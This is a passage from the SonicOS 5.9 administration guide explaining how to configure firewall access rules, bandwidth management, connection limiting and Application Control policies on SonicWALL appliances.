en-US
search-icon

SonicOS 5.9 Admin Guide

Firewall

Configuring Access Rules

Firewall > Access Rules

This chapter provides an overview on your SonicWALL security appliance stateful packet inspection default access rules and configuration examples to customize your access rules to meet your business requirements.

Access rules are network management tools that allow you to define ingress and egress access policy, configure user authentication, and enable remote management of the SonicWALL security appliance.

The SonicOS Firewall > Access Rules page provides a sortable access rule management interface. The subsequent sections provide high-level overviews on configuring access rules by zones and configuring bandwidth management using access rules.

Topics:

Stateful Packet Inspection Default Access Rules Overview

By default, the SonicWALL security appliance’s stateful packet inspection allows all communication from the LAN to the Internet, and blocks all traffic to the LAN from the Internet. The following behaviors are defined by the Default stateful inspection packet access rule enabled in the SonicWALL security appliance:

Allow all sessions originating from the LAN, WLAN to the WAN, or DMZ (except when the destination WAN IP address is the WAN interface of the SonicWALL appliance itself)
Allow all sessions originating from the DMZ to the WAN.
Deny all sessions originating from the WAN to the DMZ.
Deny all sessions originating from the WAN and DMZ to the LAN or WLAN.

Additional network access rules can be defined to extend or override the default access rules. For example, access rules can be created that allow access from the LAN zone to the WAN Primary IP address, or block certain types of traffic such as IRC from the LAN to the WAN, or allow certain types of traffic, such as Lotus Notes database synchronization, from specific hosts on the Internet to specific hosts on the LAN, or restrict use of certain protocols such as Telnet to authorized users on the LAN.

Custom access rules evaluate network traffic source IP addresses, destination IP addresses, IP protocol types, and compare the information to access rules created on the SonicWALL security appliance. Network access rules take precedence, and can override the SonicWALL security appliance’s stateful packet inspection. For example, an access rule that blocks IRC traffic takes precedence over the SonicWALL security appliance default setting of allowing this type of traffic.

* 
CAUTION: The ability to define network access rules is a very powerful tool. Using custom access rules can disable firewall protection or block all access to the Internet. Use caution when creating or deleting network access rules.

Using Bandwidth Management with Access Rules Overview

Bandwidth management (BWM) allows you to assign guaranteed and maximum bandwidth to services and prioritize traffic. Using access rules, BWM can be applied on specific network traffic. Packets belonging to a bandwidth management enabled policy will be queued in the corresponding priority queue before being sent.

You must configure Bandwidth Management individually for each interface on the Network > Interfaces page. Click the Configure icon for the interface, and select the Advanced tab. Enter your available egress and ingress bandwidths in the Available interface Egress Bandwidth (Kbps) and Available interface Ingress Bandwidth (Kbps) fields, respectively. This applies when the Bandwidth Management Type on the Firewall Services > BWM page is set to either Advanced or Global.

Example Scenario

If you create an access rule for outbound mail traffic (such as SMTP) and enable bandwidth management with the following parameters:

Guaranteed bandwidth of 20 percent
Maximum bandwidth of 40 percent
Priority of 0 (zero)

The outbound SMTP traffic is guaranteed 20% of available bandwidth available to it and can get as much as 40% of available bandwidth. If SMTP traffic is the only BWM enabled rule:

When SMTP traffic is using its maximum configured bandwidth (which is the 40% maximum described above), all other traffic gets the remaining 60% of bandwidth.
When SMTP traffic is using less than its maximum configured bandwidth, all other traffic gets between 60% and 100% of the link bandwidth.

Now consider adding the following BWM-enabled rule for FTP:

Guaranteed bandwidth of 60%
Maximum bandwidth of 70%
Priority of 1

When configured along with the previous SMTP rule, the traffic behaves as follows:

60% of total bandwidth is always reserved for FTP traffic (because of its guarantee). 20% of total bandwidth is always reserved for SMTP traffic (because of its guarantee).
If SMTP is using 40% of total bandwidth and FTP is using 60% of total bandwidth, then no other traffic can be sent, because 100% of the bandwidth is being used by higher priority traffic. If SMTP and FTP are using less than their maximum values, then other traffic can use the remaining percentage of available bandwidth.
If SMTP traffic reduces and only uses 10% of total bandwidth, then FTP can use up to 70% and all the other traffic gets the remaining 20%.
If SMTP traffic stops, FTP gets 70% and all other traffic gets the remaining 30% of bandwidth.
If FTP traffic has stopped, SMTP gets 40% and all other traffic get the remaining 60% of bandwidth.

Access Rules Configuration Tasks

Topics:

Displaying Access Rules with View Styles

Access rules can be displayed in multiple views using SonicOS Enhanced. You can select the type of view from the selections in the View Style section:

All Rules - Select All Rules to display all access rules configured on the SonicWALL security appliance.
Matrix - Displays as From/To with LAN, WAN, VPN, or other interface in the From row, and LAN, WAN, VPN, or other interface in the To column. Select the Edit icon in the table cell to view the access rules.
Drop-down Boxes - Displays two drop-down menus: From Zone and To Zone. Select an interface from the From Zone menu and select an interface from the To Zone menu. Click OK and access rules defined for the two interfaces are displayed.
* 
TIP: You can also view access rules by zones. Use the Option check boxes in the From Zone and To Zone column. Select LAN, WAN, VPN, ALL from the From Zone column. And then select LAN, WAN, VPN, ALL from the To Zone column. Click OK to display the access rules.

Each view displays a table of defined network access rules. For example, selecting All Rules displays all the network access rules for all zones.

Configuring Access Rules for a Zone

To display the Access Rules for a specific zone, select a zone from the Matrix, Drop-down Boxes, or All Rules view.

The access rules are sorted from the most specific at the top, to less specific at the bottom of the table. At the bottom of the table is the Any rule. The default access rule is all IP services except those listed in the Access Rules page. Access rules can be created to override the behavior of the Any rule; for example, the Any rule allows users on the LAN to access all Internet services, including NNTP News.

You can change the priority ranking of an access rule by clicking the Arrows icon in the Priority column. The Change Priority dialog displays. Enter the new priority number (1-10) in the Priority field, and then click OK.

* 
TIP: If the Delete or Edit icons are dimmed (unavailable), the access rule cannot be changed or deleted from the list.

Adding Access Rules

To add access rules:
1
Click Add at the bottom of the Access Rules table. The Add Rule dialog displays.

2
Select Allow | Deny | Discard from the Action list to permit or block IP traffic.
3
Select the from and to zones from the From Zone and To Zone menus.
4
Select the service or group of services affected by the access rule from the Service list. The Default service encompasses all IP services.

If the service is not listed, you must define the service in the Add Service dialog. Select Create New Service or Create New Group to display the Add Service dialog or Add Service Group dialog.

5
Select the source of the traffic affected by the access rule from the Source list. Selecting Create New Network displays the Add Address Object window.
6
If you want to define the source IP addresses that are affected by the access rule, such as restricting certain users from accessing the Internet, type the starting IP addresses of the address range in the Address Range Begin field and the ending IP address in the Address Range End field. To include all IP addresses, type * in the Address Range Begin field.
7
Select the destination of the traffic affected by the access rule from the Source list. Selecting Create New Network displays the Add Address Object dialog.
8
From the Users Allowed menu, add the user or user group affected by the access rule.
9
Select a schedule from the Schedule menu. The default schedule is Always on.
10
Enter any comments to help identify the access rule in the Comments field.
11
The Allow Fragmented Packets check box is enabled by default. Large IP packets are often divided into fragments before they are routed over the Internet and then reassembled at a destination host.
* 
TIP: One reason to disable this setting is because it is possible to exploit IP fragmentation in Denial of Service (DoS) attacks.
12
Click the Advanced tab.

13
To timeout the access rule after a period of TCP inactivity, set the amount of time, in minutes, in the TCP Connection Inactivity Timeout (minutes) field. The default value is 5 minutes.
14
To timeout the access rule after a period of UDP inactivity, set the amount of time, in minutes, in the UDP Connection Inactivity Timeout (minutes) field. The default value is 30 minutes.
15
Specify the number of connections allowed as a percent of maximum number of connections allowed by the SonicWALL security appliance in the Number of connections allowed (% of maximum connections) field. Refer to Connection Limiting Overview, for more information on connection limiting.
16
Select Create a reflexive rule to create a matching access rule to this one in the opposite direction--from your destination zone or address object to your source zone or address object.
17
Click on the QoS tab to apply DSCP or 802.1p Quality of Service management to traffic governed by this rule. See the 802.1p and DSCP QoS, for more information on managing QoS marking in access rules.

18
Under DSCP Marking Settings select the DSCP Marking Action:.
None: DSCP values in packets are reset to 0.
Preserve (default): DSCP values in packets remain unaltered.
Explicit: Set the DSCP value to the value selected in the Explicit DSCP Value field. This is a numeric value between 0 and 63. Some of the standard values are:
0 - Best effort/Default (default)
8 - Class 1
10 - Class 1, Gold (AF11)
12 - Class 1, Silver (AF12)
14 - Class 1, Bronze (AF13)
16 - Class 2
18 - Class 2, Gold (AF21)
20 - Class 2, Silver (AF22)
22 - Class 2, Bronze (AF23)
24 - Class 3
26 - Class 3, Gold (AF31)
27 - Class 3, Silver (AF32)
30 - Class 3, Bronze (AF33)
32 - Class 4
34 - Class 4, Gold (AF41)
36 - Class 4, Silver (AF42)
38 - Class 4, Bronze (AF43)
40 - Express Forwarding
46 - Expedited Forwarding (EF)
48 - Control
56 - Control
Map: The QoS mapping settings on the Firewall > QoS Mapping page will be used. See Firewall Settings > QoS Mapping (NSA Series Only) for instructions on configuring the QoS Mapping. If you select Map, you can select Allow 802.1p Marking to override DSCP values.
19
Under 802.1p Marking Settings select the 802.1p Marking Action:
None (default): No 802.1p tagging is added to the packets.
Preserve: 802.1p values in packets will remain unaltered.
Explicit: Set the 802.1p value to the value you select in the Explicit 802.1p Value field. This is a numeric value between 0 and 7:
0 - Best effort (default)
1 - Background
2 - Spare
3 - Excellent effort
4 - Controlled load
5 - Video (<100ms latency)
6 - Voice (<10ms latency)
7 - Network control
Map: The QoS mapping settings on the Firewall > QoS Mapping page will be used. See Firewall Settings > QoS Mapping (NSA Series Only), for instructions on configuring the QoS Mapping.
20
Click OK to add the rule.
* 
TIP: Although custom access rules can be created that allow ingress IP traffic, the SonicWALL security appliance does not disable protection from DoS attacks, such as the SYN Flood and Ping of Death attacks.

Editing an Access Rule

To display the Edit Rule dialog (includes the same settings as the Add Rule dialog), click the Edit icon.

Deleting an Access Rule

To delete the individual access rule, click on the Delete icon. To delete all the check box selected access rules, click the Delete button.

Enabling and Disabling an Access Rule

To enable or disable an access rule, click the Enable check box.

Restoring Access Rules to Default Zone Settings

To remove all end-user configured access rules for a zone, click the Default button. This restores the access rules for the selected zone to the default access rules initially setup on the SonicWALL security appliance.

Displaying Access Rule Traffic Statistics

Move your mouse pointer over the Graph icon to display the following access rule receive (Rx) and transmit (Tx) traffic statistics:

 
Rx Bytes
Tx Bytes
Rx Packets
Tx Packets

Connection Limiting Overview

The Connection Limiting feature is intended to offer an additional layer of security and control when coupled with such SonicOS features as SYN Cookies and Intrusion Prevention Services (IPS). Connection limiting provides a means of throttling connections through the SonicWALL using Access Rules as a classifier, and declaring the maximum percentage of the total available connection cache that can be allocated to that class of traffic.

Coupled with IPS, this can be used to mitigate the spread of a certain class of malware as exemplified by Sasser, Blaster, and Nimda. These worms propagate by initiating connections to random addresses at atypically high rates. For example, each host infected with Nimda attempted 300 to 400 connections per second, Blaster sent 850 packets per second, and Sasser was capable of 5,120 attempts per second. Typical, non-malicious network traffic generally does not establish anywhere near these numbers, particularly when it is Trusted ->Untrusted traffic (that is, LAN->WAN). Malicious activity of this sort can consume all available connection-cache resources in a matter of seconds, particularly on smaller appliances.

In addition to mitigating the propagation of worms and viruses, Connection limiting can be used to alleviate other types of connection-cache resource consumption issues, such as those posed by uncompromised internal hosts running peer-to-peer software (assuming IPS is configured to allow these services), or internal or external hosts using packet generators or scanning tools.

* 
NOTE: The maximum number of connections a SonicWALL security appliance can support depends on the specific configuration, including whether App Flow is enabled and if an external collector is configured, as well as the physical capabilities of the particular model on the SonicWALL security appliance. For more information see Connections.

Finally, connection limiting can be used to protect publicly available servers (for example, Web servers) by limiting the number of legitimate ingress connections permitted to the server (that is, to protect the server against the Slashdot-effect). This is different from SYN flood protection which attempts to detect and prevent partially-open or spoofed TCP connection. This will be most applicable for Untrusted traffic, but it can be applied to any zone traffic as needed.

Connection limiting is applied by defining a percentage of the total maximum allowable connections that may be allocated to a particular type of traffic. The above figures show the default LAN ->WAN setting, where all available resources may be allocated to LAN->WAN (any source, any destination, any service) traffic.

More specific rules can be constructed; for example, to limit the percentage of connections that can be consumed by a certain type of traffic (for example, FTP traffic to any destination on the WAN), or to prioritize important traffic (for example, HTTPS traffic to a critical server) by allowing 100% to that class of traffic, and limiting general traffic to a smaller percentage (minimum allowable value is 1%).

* 
NOTE: It is not possible to use IPS signatures as a connection limiting classifier; only Access Rules (that is, Address Objects and Service Objects) are permissible.

Access Rule Configuration Examples

This section provides configuration examples on adding network access rules:

Enabling Ping

This section provides a configuration example for an access rule to allow devices on the DMZ to send ping requests and receive ping responses from devices on the LAN. By default your SonicWALL security appliance does not allow traffic initiated from the DMZ to reach the LAN. Once you have placed one of your interfaces into the DMZ zone, then from the Firewall > Access Rules window, perform the following steps to configure an access rule that allow devices in the DMZ to send ping requests and receive ping responses from devices in the LAN.

To enable Ping:
1
Click Add to launch the Add Rule dialog.
2
Select the Allow radio button.
3
From the Service menu, select Ping.
4
From the Source menu, select DMZ Subnets.
5
From the Destination menu, select LAN Subnets.
6
Click OK.
Blocking LAN Access for Specific Services

This section provides a configuration example for an access rule blocking LAN access to NNTP servers on the Internet during business hours.

To configure an access rule blocking LAN access to NNTP servers based on a schedule:
1
Click Add to launch the Add dialog.
2
Select Deny from the Action settings.
3
Select NNTP from the Service menu. If the service is not listed in the list, you must to add it in the Add Service dialog.
4
Select Any from the Source menu.
5
Select WAN from the Destination menu.
6
Select the schedule from the Schedule menu.
7
Enter any comments in the Comment field.
8
Click Add.
Allowing WAN Primary IP Access from the LAN Zone

By creating an access rule, it is possible to allow access to a management IP address in one zone from a different zone on the same SonicWALL appliance. For example, you can allow HTTP/HTTPS management or ping to the WAN IP address from the LAN side. To do this, you must create an access rule to allow the relevant service between the zones, giving one or more explicit management IP addresses as the destination. Alternatively, you can provide an address group that includes single or multiple management addresses (for example, WAN Primary IP, All WAN IP, All X1 Management IP) as the destination. This type of rule allows the HTTP Management, HTTPS Management, SSH Management, Ping, and SNMP services between zones.

* 
NOTE: Access rules can only be set for inter-zone management. Intra-zone management is controlled per-interface by settings in the interface configuration
To create a rule that allows access to the WAN Primary IP from the LAN zone:
1
On the Firewall > Access Rules page, display the LAN > WAN access rules.
2
Click Add to launch the Add dialog.
3
Select Allow from the Action settings.
4
Select one of the following services from the Service menu:
HTTP
HTTPS
SSH Management
Ping
SNMP
5
Select Any from the Source menu.
6
Select an address group or address object containing one or more explicit WAN IP addresses from the Destination menu.
* 
NOTE: Do not select an address group or object representing a subnet, such as WAN Primary Subnet. This would allow access to devices on the WAN subnet (already allowed by default), but not to the WAN management IP address.
7
Select the user or group to have access from the Users Allowed menu.
8
Select the schedule from the Schedule menu.
9
Enter any comments in the Comment field.
10
Click Add.
Enabling Bandwidth Management on an Access Rule

Bandwidth management can be applied on both ingress and egress traffic using access rules. Access rules displaying the Funnel icon are configured for bandwidth management.

* 
TIP: Do not configure bandwidth management on multiple interfaces on a zone, where the configured guaranteed bandwidth for the zone is greater than the available bandwidth for the bound interface.

For information on configuring Bandwidth Management see Bandwidth Management Overview.

Configuring Application Control

About Application Control

This chapter describes how to configure and manage the Application Control feature in SonicOS.

Topics:

Application Control Overview

Topics:

What is Application Control?

Application Control provides a solution for setting policy rules for application signatures. Application Control policies include global App Control policies, and App Rules policies that are more targeted. You can also create certain types of App Control policies on the fly directly from the Dashboard > App Flow Monitor page.

As a set of application-specific policies, Application Control gives you granular control over network traffic on the level of users, email addresses, schedules, and IP-subnets. The primary functionality of this application-layer access control feature is to regulate Web browsing, file transfer, email, and email attachments.

In SonicOS 5.8 and higher, the ability to control application layer traffic in SonicOS is significantly enhanced with the ability to view real-time application traffic flows, and new ways to access the application signature database and to create application layer rules. SonicOS 5.8 integrates application control with standard network control features for more powerful control over all network traffic.

Beginning in SonicOS 5.9, you can use regular expressions to match patterns in network traffic. Specifically, App Control policies can utilize reassembly-free regular expression matching. This means that no buffering of the input content is required, and patterns are matched across packet boundaries.

Topics:
About App Control Policies

In SonicOS 5.9, there are three ways to create App Control policies and control applications in your network:

Create Rule from App Flow Monitor – The Dashboard > App Flow Monitor page provides a Create Rule button that allows you to quickly configure App Control policies for application blocking, bandwidth management, or packet monitoring. This allows you to quickly apply an action to an application that you notice while using the SonicWALL Visualization and Application Intelligence features. The policy is automatically created and displayed in the App Rules Policies table on the Firewall > App Rules page.
App Control Advanced – The Firewall > App Control Advanced page provides a simple and direct way of configuring global App Control policies. You can quickly enable blocking or logging for a whole category of applications, and can easily locate and do the same for an individual application or individual signature. When enabled, the category, application, or signature is blocked or logged globally without the need to create a policy on the Firewall > App Rules page. All application detection and prevention configuration is available on the Firewall > App Control Advanced page.
App Rules – The Firewall > App Rules page provides the third way to create an App Control policy. This method is equivalent to the method used in the original Application Firewall feature. Policies created using App Rules are more targeted because they combine a match object, action object, and possibly email address object into a policy. For flexibility, App Rules policies can access the same application controls for any of the categories, applications, or signatures available on the App Control Advanced page.

The Firewall > Match Objects page provides a way to create Application List objects, Application Category List objects, and Application Signature List objects for use as match objects in an App Rules policy. The Match Objects page is also where you can configure regular expressions for matching content in network traffic. The Firewall > Action Objects pages allows you to create custom actions for use in the policy.

About Application Control Capabilities

Application Control’s data leakage prevention component provides the ability to scan files and documents for content and keywords. Using Application Control, you can restrict transfer of certain file names, file types, email attachments, attachment types, email with certain subjects, and email or attachments with certain keywords or byte patterns. You can deny internal or external network access based on various criteria. You can use Packet Monitor to take a deeper look at application traffic, and can select among various bandwidth management settings to reduce network bandwidth usage by an application.

Based on SonicWALL’s Reassembly Free Deep Packet Inspection technology, Application Control also features intelligent prevention functionality which allows you to create custom, policy-based actions. Examples of custom actions include:

Blocking entire applications based on their signatures
Blocking application features or sub-components
Bandwidth throttling for file types when using the HTTP or FTP protocols
Blocking an attachment
Sending a custom block page
Sending a custom email reply
Redirecting an HTTP request
Sending a custom FTP reply over an FTP control channel

While Application Control primarily provides application level access control, application layer bandwidth management and data leakage prevention, it also includes the ability to create custom application or protocol match signatures. You can create a custom policy with App Rules that matches any protocol you wish, by matching a unique piece of the protocol. See Custom Signature.

Application Control provides excellent functionality for preventing the accidental transfer of proprietary documents. For example, when using the automatic address completion feature of Outlook Exchange, it is a common occurrence for a popular name to complete to the wrong address. See Multiple names completing an address for an example.

Multiple names completing an address

Benefits of Application Control

Application based configuration makes it easier to configure policies for application control.
The Application Control subscription service provides updated signatures as new attacks emerge.
The related Application Intelligence functionality, as seen in App Flow Monitor and the Real Time Visualization Monitor, is available upon registration as a 30-day free trial App Visualization license. This allows any registered SonicWALL appliance to clearly display information about application traffic in the network. The App Visualization and App Control licenses are also included with the SonicWALL Security Services license bundle.
* 
NOTE: The feature must be enabled in the SonicOS management interface to become active.
You can use the Create Rule button to quickly apply bandwidth management or packet monitoring to an application that they notice while viewing the App Flow Monitor page, or can completely block the application.
You can configure policy settings for individual signatures without influencing other signatures of the same application.
Application Control configuration dialogs are available in the Firewall menu in the SonicOS management interface, consolidating all Firewall and Application Control access rules and policies in the same area.

Application Control functionality can be compared to three main categories of products:

Standalone proxy appliances
Application proxies integrated into firewall VPN appliances
Standalone IPS appliances with custom signature support

Standalone proxy appliances are typically designed to provide granular access control for a specific protocol. SonicWALL Application Control provides granular, application level access control across multiple protocols, including HTTP, FTP, SMTP, and POP3. Because Application Control runs on your SonicWALL firewall, you can use it to control both inbound and outbound traffic, unlike a dedicated proxy appliance that is typically deployed in only one direction. Application Control provides better performance and scalability than a dedicated proxy appliance because it is based on SonicWALL’s proprietary Deep Packet Inspection technology.

Today’s integrated application proxies do not provide granular, application level access control, application layer bandwidth management, and digital rights management functionality. As with dedicated proxy appliances, SonicWALL Application Control provides much higher performance and far greater scalability than integrated application proxy solutions.

While some standalone IPS appliances provide protocol decoding support, none of these products supports granular, application level access control, application layer bandwidth management, and digital rights management functionality.

In comparing Application Control to SonicWALL Email Security, there are benefits to using either. Email Security only works with SMTP, but it has a very rich policy space. Application Control works with SMTP, POP3, HTTP, FTP and other protocols, is integrated into SonicOS on the firewall, and has higher performance than Email Security. However, Application Control does not offer all the policy options for SMTP that are provided by Email Security.

How Does Application Control Work?

Application Control utilizes SonicOS Deep Packet Inspection to scan application layer network traffic as it passes through the gateway and locate content that matches configured applications. When a match is found, these features perform the configured action. When you configure App Control policies, you create global rules that define whether to block or log the application, which users, groups, or IP address ranges to include or exclude, and a schedule for enforcement.

Additionally, you can create App Rules policies that define the type of applications to scan, the direction, the content, keywords, or regular expression to match, optionally the user or domain to match, and the action to perform.

Topics:
Actions Using Bandwidth Management

Application layer bandwidth management (BWM) allows you to create policies that regulate bandwidth consumption by specific file types within a protocol, while allowing other file types to use unlimited bandwidth. This enables you to distinguish between desirable and undesirable traffic within the same protocol. Application layer bandwidth management is supported for all Application matches, as well as custom App Rules policies using HTTP client, HTTP Server, Custom, and FTP file transfer types. For details about policy types, see the App Rules Policy Creation.

Topics:
Types of BWM

Two types of bandwidth management are available:

Advanced – Bandwidth management can be configured separately for App Rule.
Global – Configured bandwidth management can be applied globally to all interfaces in all zones.
Setting BWM

Firewall Settings > BWM Page

If the Bandwidth Management Type on the Firewall Settings > BWM page is set to Global, application layer bandwidth management functionality is supported with eight predefined, default BWM priority levels, available when adding a policy from the Firewall > App Rules page. There is also a customizable Bandwidth Management type action, available when adding a new action from the Firewall > Action Objects page.

Bandwidth management can also be configured from the App Flow Monitor page by selecting a service type application or a signature type application and then clicking the Create Rule button. The Bandwidth Management options available there depend on the enabled priority levels in the Global Priority Queue table on the Firewall Settings > BWM page. The priority levels enabled by default are High, Medium, and Low.

All application bandwidth management is tied in with global bandwidth management, which is configured on the Firewall Settings > BWM page.

All App Control dialogs that offer an option for bandwidth management provide a link to the Firewall Settings > BWM page so that you can easily configure global bandwidth management settings for the type and the guaranteed and maximum percentages allowed for each priority level.

* 
TIP: As a best practice, configuring the Global Bandwidth Management settings on the Firewall Settings > BWM page should always be done before configuring any BWM policies.

Changing the Bandwidth Management Type on the Firewall Settings > BWM page from Advanced to Global disables BWM in all Access Rules. However, the default BWM action objects in App Control policies are converted to the global bandwidth management settings.

When you change the Bandwidth Management Type from Global to Advanced, the default BWM actions that are in use in any App Rules policies are automatically converted to Advanced BWM Medium, no matter what level they were set to before the change.

Default BWM Actions

A number of BWM action options are also available in the predefined, default action list. The BWM action options change depending on the Bandwidth Management Type setting on the Firewall Settings > BWM page. If the Bandwidth Management Type is set to Global, all eight priorities are selectable. If the Bandwidth Management Type is set to Advanced, no priorities are selectable, but the predefined priorities are available when adding a policy.

Default BWM Actions for Adding a Policy shows predefined default actions that are available when adding a policy.

 

Default BWM Actions for Adding a Policy

Always Available

If BWM Type = Global

If BWM Type = Advanced

Reset / Drop

No Action

Bypass DPI

Packet Monitor

0 – Realtime

1 – Highest

2 – High

3 – Medium High

4 – Medium

5 – Medium Low

6 – Low

7 – Lowest

Advanced BWM Low

Advanced BWM Medium

Advanced BWM High

When you toggle between Advanced and Global, the default BWM actions are converted to BWM Global-Medium. The firewall does not store your previous priority levels when you switch the type back and forth. You can view the conversions on the Firewall > App Rules page.

Custom BWM Actions

Custom BWM actions behave differently than the default BWM actions. Custom BWM actions are configured by creating action objects on the Firewall > Action Objects page. Custom Bandwidth Management actions, and the policies that use those actions, retain their priority settings whenever the Bandwidth Management Type is toggled between Global and Advanced.

Custom BWM Action in Policy with BWM Type of Global shows the same policy after the global Bandwidth Management Type is set to Global. Only the Priority appears in the tooltip, because no values are set in the Global Priority Queue for guaranteed or maximum bandwidth for level 5.

Custom BWM Action in Policy with BWM Type of Global

Setting BWM Priority

When the Bandwidth Management Type is set to Global, the Add/Edit Action Object dialog provides the Bandwidth Priority option, but uses the values that are specified in the Priority table on the Firewall Settings > BWM page for Guaranteed Bandwidth and Maximum Bandwidth; see Bandwidth Management Type on Firewall Settings > BWM.

Bandwidth Management Type on Firewall Settings > BWM

Add/Edit Action Objects Page with BWM Type Global shows the Bandwidth Priority selections in the Add/Edit Action Objects dialog when the global Bandwidth Management Type is set to Global on the Firewall Settings > BWM page.

Add/Edit Action Objects Page with BWM Type Global

* 
NOTE: All priorities are displayed (Realtime - Lowest) regardless of whether or not the have been configured. Refer to the Firewall Settings > BWM page to determine which priorities are enabled. If the Bandwidth Management Type is set to Global and you select a Bandwidth Priority that is not enabled, the traffic is automatically mapped to the level 4 priority (Medium).
How BWM Configuration Is Handled

Application layer bandwidth management configuration is handled in the same way as Access Rule bandwidth management configuration. Both are tied in with the global bandwidth management settings. However, with Application Control you can specify all content type, which you cannot do with access rules.

For a bandwidth management use case, as an administrator, you might want to limit .mp3 and executable file downloads during work hours to no more than 1 Mbps. At the same time, you want to allow downloads of productive file types such as .doc or .pdf up to the maximum available bandwidth, or even give the highest possible priority to downloads of the productive content. As another example, you might want to limit bandwidth for a certain type of peer-to-peer (P2P) traffic, but allow other types of P2P to use unlimited bandwidth. Application layer bandwidth management allows you to create policies to do this.

* 
NOTE: Guaranteed bandwidth for all levels of BWM combined must not exceed 100%.
Actions Using Packet Monitoring

When the predefined Packet Monitor action is selected for a policy, SonicOS will capture or mirror the traffic according to the settings you have configured on the Dashboard > Packet Monitor or System > Packet Monitor page. The default is to create a capture file, which you can view with Wireshark. Once you have configured a policy with the Packet Monitor action, you still need to click Start Capture on the Packet Monitor page to actually capture any packets. After you have captured the desired packets, click Stop Capture.

To control the Packet Monitor action to capture only the packets related to your policy, click Configure on the Packet Monitor page and select Enable Filter based on the firewall/app rule on the Monitor Filter tab. In this mode, after you click Start Capture on the Packet Monitor page, packets are not captured until some traffic triggers the App Control policy (or Firewall Access Rule). You can see the Alert message in the Log > Log Monitor page when the policy is triggered. This works when Packet Monitor is selected in App Control policies created with the Create Rule button or with the App Rules method using an action object, or in Firewall Access Rules, and allows you to specify configuration or filtering for what to capture or mirror. You can download the capture in different formats and look at it in a Web page, for example.

To set up mirroring, go to the Mirror tab and pick an interface to which to send the mirrored traffic in the Mirror filtered packets to Interface (NSA platforms only) field under Local Mirroring Settings. You can also configure one of the Remote settings. This allows you to mirror the application packets to another computer and store everything on the hard disk. For example, you could capture everyone’s MSN Instant Messenger traffic and read the conversations.

See Configuring Packet Monitor for more information about Packet Monitor configuration.

Create Rule from App Flow Monitor

The Dashboard > App Flow Monitor page provides a Create Rule button. If, while viewing the App Flow Monitor, you see an application that seems suspicious or is using excessive amounts of bandwidth, you can simply select the application in the list, then click Create Rule and configure an App Control policy for it immediately. You can also select multiple applications and then use Create Rule to configure a policy that applies to all of them.

* 
NOTE: General applications cannot be selected. Service type applications and signature type applications cannot be mixed in a single rule.

Figure shows the Create Rule dialog displayed over the Dashboard > App Flow Monitor page.

Dashboard > App Flow Monitor Page with Create Rule dialog

The Create Rule feature is available from App Flow Monitor on the list view page setting. The Create Rule button is visible, but disabled, on the pie chart and graphical monitoring views.

You can configure the following types of policies in the Create Rule dialog:

Block – the application will be completely blocked by the firewall
Bandwidth Manage – choose one of the BWM levels to use Global Bandwidth Management to control the bandwidth used by the application no matter which interface it traverses
* 
NOTE: Bandwidth management must be enabled on each interface where you want to use it. You can configure interfaces from the Network > Interfaces page.
Packet Monitor – capture packets from the application for examination and analysis

After you select the desired action for the rule and then click Create Rule within the Create Rule dialog, an App Control policy is automatically created and added to the App Rules Policies table on the Firewall > App Rules page.

The Create Rule dialog contains a Configure button next to the Bandwidth Manage section that takes you to the Firewall Settings > BWM page where you can configure the Global Priority Queue. For more information about global bandwidth management and the Firewall Settings > BWM page, see the Actions Using Bandwidth Management. The Bandwidth Manage options you see in the Create Rule dialog reflect the options that are enabled in the Global Priority Queue. The default values are:

BWM Global-High – Guaranteed 30%; Max/Burst 100%
BWM Global-Medium – Guaranteed 50%; Max/Burst 100%
BWM Global-Low – Guaranteed 20%; Max/Burst 100%
App Control Advanced Policy Creation

The configuration method on the Firewall > App Control Advanced page allows granular control of specific categories, applications, or signatures. This includes granular logging control, granular inclusion and exclusion of users, groups, or IP address ranges, and schedule configuration. The settings here are global policies and independent from any custom App Rules policy.

You can configure the following settings on this page:

Select a category, an application, or a signature.
Select blocking, logging, or both as the action.
Specify users, groups, or IP address ranges to include in or exclude from the action.
Set a schedule for enforcing the controls.

While these application control settings are independent from App Rules policies, you can also create application match objects for any of the categories, applications, or signatures available here or on the Firewall > Match Objects page, and use those match objects in an App Rules policy. This allows you to use the wide array of actions and other configuration settings available with Application Control. See the Application List Objects for more information about this policy-based user interface for application control.

App Rules Policy Creation

You can use Application Control to create custom App Rules policies to control specific aspects of traffic on your network. A policy is a set of match objects, properties, and specific prevention actions.When you create a policy, you first create a match object, then select and optionally customize an action, then reference these when you create the policy.

In the Firewall > App Rules page, you can access the Policy Settings dialog, shown below, for a Policy Type of SMTP Client. The screen changes depending on the Policy Type you select.

Some examples of policies include:

Block applications for activities such as gambling
Disable .exe and .vbs email attachments
Do not allow the Mozilla browser on outgoing HTTP connections
Do not allow outgoing email or MS Word attachments with the keywords SonicWALL Confidential, except from the CEO and CFO
Do not allow outgoing email that includes a graphic or watermark found in all confidential documents

When you create a policy, you select a policy type. Each policy type specifies the values or value types that are valid for the source, destination, match object type, and action fields in the policy. You can further define the policy to include or exclude specific users or groups, select a schedule, turn on logging, and specify the connection side as well as basic or advanced direction types. A basic direction type simply indicates inbound or outbound. An advanced direction type allows zone to zone direction configuration, such as from the LAN to the WAN.

App Rules: Policy Type Characteristics describes the characteristics of the available App Rules policy types.

 

App Rules: Policy Type Characteristics

Policy Type

Description

Valid Source Service / Default

Valid Destination Service / Default

Valid Match Object Type

Valid Action Type

Connection Side

App Control Content

Policy using dynamic Application Control related objects for any application layer protocol

N/A

N/A

Application Category List, Application List, Application Signature List

Reset/Drop, No Action, Bypass DPI, Packet Monitor, BWM Global-*, WAN BWM *

N/A

CFS

Policy for content filtering

N/A

N/A

CFS Category List

CFS Block Page, Packet Monitor, No Action, BWM Global-*, WAN BWM *

N/A

Custom Policy

Policy using custom objects for any application layer protocol; can be used to create IPS-style custom signatures

Any / Any

Any / Any

Custom Object

Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM *

Client Side, Server Side, Both

FTP Client

Any FTP command transferred over the FTP control channel

Any / Any

FTP Control / FTP Control

FTP Command, FTP Command + Value, Custom Object

Reset/Drop, Bypass DPI, Packet Monitor, No Action

Client Side

FTP Client File Upload Request

An attempt to upload a file over FTP (STOR command)

Any / Any

FTP Control / FTP Control

Filename, file extension

Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM *

Client Side

FTP Client File Download Request

An attempt to download a file over FTP (RETR command)

Any / Any

FTP Control / FTP Control

Filename, file extension

Reset/Drop, Bypass DPI, Packet Monitor, No Action, BWM Global-*, WAN BWM *

Client Side

FTP Data Transfer Policy

Data transferred over the FTP Data channel

Any / Any

Any / Any

File Content Object

Reset/Drop, Bypass DPI, Packet Monitor, No Action

Both

